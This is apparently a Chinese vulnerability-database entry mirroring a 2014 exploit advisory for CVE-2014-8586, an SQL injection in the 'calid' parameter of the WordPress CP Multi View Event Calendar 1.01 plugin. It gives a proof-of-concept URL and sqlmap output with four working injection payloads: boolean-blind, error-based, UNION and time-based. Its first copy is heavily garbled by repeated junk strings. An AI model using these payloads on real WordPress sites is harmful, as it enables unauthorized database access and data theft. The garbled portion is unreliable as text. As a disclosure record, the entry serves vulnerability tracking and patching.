WordPress CP Multi View Event Calendar 1.01 SQL Injection

34   2019-08-05 08:08   nipc
漏洞信息
漏洞编号: 1329
CVE编号: CVE-2014-8586
漏洞类型: -
漏洞来源: cxs
发布日期: 2014-10-24
CVSS
CVSS值: 7.5/10
严重级别: 中危
利用范围: Remote
攻击复杂度: Low
认证级别: No required
漏洞描述

WLB-2014100144[***]http://cxsecurity.com/issue/WLB-2014100144[***]Bug: WordPress CP Multi View Event Calendar 1.01 SQL Injection ( Ascii Version )[***]WordPress CP Multi View Event Calendar 1.01 SQL Injection[***]2014-10-24 / 2014-11-05[***]Claudio Viviani[***]Medium[***]CWE-89@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** [***]CVE-2014-8586@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893********[***]No[***]Yes[***]7.5/10[***]6.4/10[***]10/10[***]Remote[***]No required[***]Partial[***]Partial[***]Partial[***] ######################@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** # Exploit Title : CP Multi View Event Calendar 1.01 SQL Injection Vulnerability@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** # Exploit Author : Claudio Viviani @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** # Software Link : https://downloads.wordpress.org/plugin/cp-multi-view-calendar.zip@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** # Date : 2014-10-23@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** # Tested on : Windows 7 / Mozilla Firefox@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Windows 7 / sqlmap (0.8-1)@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Linux / Mozilla Firefox@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Linux / sqlmap 1.0-dev-5b2ded0@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** ######################@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** # Description@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** CP Multi View Event Calendar 1.01 suffers from SQL injection vulnerability@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** calid variable is not sanitized.@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** ######################@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** # PoC@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** http://localhost/?cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1 [Sqli]@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** # Sqlmap@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** ---@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Place: GET@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Parameter: calid@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Type: boolean-based blind@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Payload: cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1 RLIKE (SELECT (CASE WHEN@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** (9095=9095) THEN 1 ELSE 0x28 END))@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Type: error-based@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Payload: cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1 AND (SELECT 3807@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** FROM(SELECT COUNT(*),CONCAT(0x7171736971,(SELECT (CASE WHEN (3807=3807) THEN 1 ELSE 0@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** END)),0x716b716671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&#######

POC

###################### # Exploit Title : CP Multi View Event Calendar 1.01 SQL Injection Vulnerability # Exploit Author : Claudio Viviani # Software Link : https://downloads.wordpress.org/plugin/cp-multi-view-calendar.zip # Date : 2014-10-23 # Tested on : Windows 7 / Mozilla Firefox Windows 7 / sqlmap (0.8-1) Linux / Mozilla Firefox Linux / sqlmap 1.0-dev-5b2ded0 ###################### # Description CP Multi View Event Calendar 1.01 suffers from SQL injection vulnerability calid variable is not sanitized. ###################### # PoC http://localhost/?cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1 [Sqli] # Sqlmap --- Place: GET Parameter: calid Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1 RLIKE (SELECT (CASE WHEN (9095=9095) THEN 1 ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1 AND (SELECT 3807 FROM(SELECT COUNT(*),CONCAT(0x7171736971,(SELECT (CASE WHEN (3807=3807) THEN 1 ELSE 0 END)),0x716b716671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 14 columns Payload: cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171736971,0x6f7642724e6743615973,0x716b716671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL L# Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1 AND 8168=BENCHMARK(5000000,MD5(0x4a4a6d41)) --- ##################### Discovered By : Claudio Viviani http://www.homelab.it info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww #####################